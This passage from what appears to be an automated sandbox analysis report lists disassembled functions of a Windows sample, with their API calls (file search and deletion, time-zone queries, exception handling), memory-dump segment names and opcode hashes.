                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: EnvironmentVariable$ByteCharMultiWide
                                                                                                                                                                                                                                    • String ID: .rnd$HOME$RANDFILE$SYSTEMROOT$USERPROFILE
                                                                                                                                                                                                                                    • API String ID: 2184640988-1666712896
                                                                                                                                                                                                                                    • Opcode ID: 45285921c275070c670ca49d0546862358ccffd5776fb92ec22702d428bfbd5c
                                                                                                                                                                                                                                    • Instruction ID: 598501061b3cb32723b8d8403b8ff954ea72d0f72569ef58444f4e190b8e6bee
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45285921c275070c670ca49d0546862358ccffd5776fb92ec22702d428bfbd5c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7161F822B08B8245EB219FB6A47027967A9FF85BA4B448331EE2D537D5DF3EE405C300
                                                                                                                                                                                                                                    Function 00007FFD93BF3068 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2448990282.00007FFD93BF1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FFD93BF0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448927188.00007FFD93BF0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93C52000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93C9E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93CA2000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93CFB000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93D01000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2448990282.00007FFD93D04000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450214722.00007FFD93D05000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450302164.00007FFD93D07000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93bf0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: 00007A54619ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3493878592-0
                                                                                                                                                                                                                                    • Opcode ID: 00f1522312bfcd982374d2b7872c5ef4cc0ec29a30735505d4bf24cc2f66f2d8
                                                                                                                                                                                                                                    • Instruction ID: ba05b2482f18f0f329d17578cbfaa475c154be1a5745ed660d7061ac4258774f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00f1522312bfcd982374d2b7872c5ef4cc0ec29a30735505d4bf24cc2f66f2d8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C316172709A8186EB70AFA0E8A07ED7364FB84748F44503ADA8E57794DF38C648C714
                                                                                                                                                                                                                                    Function 00007FF7B2B683C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,00007FF7B2B68919,00007FF7B2B63FA5), ref: 00007FF7B2B6842B
                                                                                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(?,00007FF7B2B68919,00007FF7B2B63FA5), ref: 00007FF7B2B684AE
                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,00007FF7B2B68919,00007FF7B2B63FA5), ref: 00007FF7B2B684CD
                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,00007FF7B2B68919,00007FF7B2B63FA5), ref: 00007FF7B2B684DB
                                                                                                                                                                                                                                    • FindClose.KERNEL32(?,00007FF7B2B68919,00007FF7B2B63FA5), ref: 00007FF7B2B684EC
                                                                                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(?,00007FF7B2B68919,00007FF7B2B63FA5), ref: 00007FF7B2B684F5
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                    • String ID: %s\*
                                                                                                                                                                                                                                    • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                    • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                    • Instruction ID: cead5740d0fc8d511b4d287351b0d3642f872878ce8ae89d2c6b70e8d010f390
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9941C721A0E54280EA22BB28E4481BBE360FB66754FC40632D75D86A9CFFBCD549C714
                                                                                                                                                                                                                                    Function 00007FFD93D13229 Relevance: 12.3, APIs: 8, Instructions: 251fileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$FileFind$00007B222ErrorF020FirstLastNext
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3012744331-0
                                                                                                                                                                                                                                    • Opcode ID: 93d5875e5dee341f10784224bd53556331c46b81fbb66407b9d17040cc771b2d
                                                                                                                                                                                                                                    • Instruction ID: d824a4d1b6507703cf8d8b350cc4740b5b7495444347685c6ac1de6b7da16a36
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 93d5875e5dee341f10784224bd53556331c46b81fbb66407b9d17040cc771b2d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8DB1B522B04A8286EB318FA6D46427E77B8FB49BA4F448335DA5D53795EF3DE041C710
                                                                                                                                                                                                                                    Function 00007FFD93D15A1F Relevance: 10.6, APIs: 7, Instructions: 73COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3140674995-0
                                                                                                                                                                                                                                    • Opcode ID: 544d81e5d0bf66c33f804bb133da19342079062bac93336a06aa1597cb30c435
                                                                                                                                                                                                                                    • Instruction ID: d4b03cbf2c94622581c57d09dc4c0be9f16de2c9af48431b27bbc777b31735d6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 544d81e5d0bf66c33f804bb133da19342079062bac93336a06aa1597cb30c435
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53314772708B818AEB709FE1E8A03EE7364FB84744F44813ADA4E57A99DF38D548C710
                                                                                                                                                                                                                                    Function 00007FF7B2B6D12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3140674995-0
                                                                                                                                                                                                                                    • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                    • Instruction ID: 813650037018439056f3b81bc7c901320c46dfa1dd6a3eb00dff68d4ea121cde
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5315072609B8586EB619F64E8447EEB360FB95704F444039DB4D47B99EFB8C148C714
                                                                                                                                                                                                                                    Function 00007FF7B2B85C00 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7B2B85C45
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B85598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B855AC
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B7A948: RtlFreeHeap.NTDLL(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A95E
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B7A948: GetLastError.KERNEL32(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A968
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B7A900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7B2B7A8DF,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7A909
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B7A900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7B2B7A8DF,?,?,?,?,?,00007FF7B2B7A7CA), ref: 00007FF7B2B7A92E
                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7B2B85C34
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B855F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B8560C
                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7B2B85EAA
                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7B2B85EBB
                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7B2B85ECC
                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7B2B8610C), ref: 00007FF7B2B85EF3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4070488512-0
                                                                                                                                                                                                                                    • Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                    • Instruction ID: 080ee76178d6f77bf67e634cb9a1fc5aca53e6555820f28d494afc84c43a14ac
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3BD11722A1A24245E722BF29C4445BBE791EF66784FC58039DB4D4B69EFFBCE441C720
                                                                                                                                                                                                                                    Function 00007FF7B2B7A614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1239891234-0
                                                                                                                                                                                                                                    • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                    • Instruction ID: bbd655453336a66547e5bc006f66ef3d1000e4163d73a65bd08ad38ee6804c87
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C319232609B8185DB61DF28E8442AFB3A4FB99754F940139EB8D47B69EF7CC145CB10
                                                                                                                                                                                                                                    Function 00007FF7B2B81874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2227656907-0
                                                                                                                                                                                                                                    • Opcode ID: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                    • Instruction ID: 13ccb4e757b9ffc75b4e9254fceb4d906dead93338128e98766b9dfeed2499e7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2B1CB21B2B68241EA52BB2DD4081BBE350EB66BE4F844135DB5D4B79DFEBCE441C320
                                                                                                                                                                                                                                    Function 00007FF7B2B85E7C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7B2B85EAA
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B855F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B8560C
                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7B2B85EBB
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B85598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B855AC
                                                                                                                                                                                                                                    • _get_daylight.LIBCMT ref: 00007FF7B2B85ECC
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B855C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B2B855DC
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B7A948: RtlFreeHeap.NTDLL(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A95E
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B7A948: GetLastError.KERNEL32(?,?,?,00007FF7B2B82D22,?,?,?,00007FF7B2B82D5F,?,?,00000000,00007FF7B2B83225,?,?,?,00007FF7B2B83157), ref: 00007FF7B2B7A968
                                                                                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7B2B8610C), ref: 00007FF7B2B85EF3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
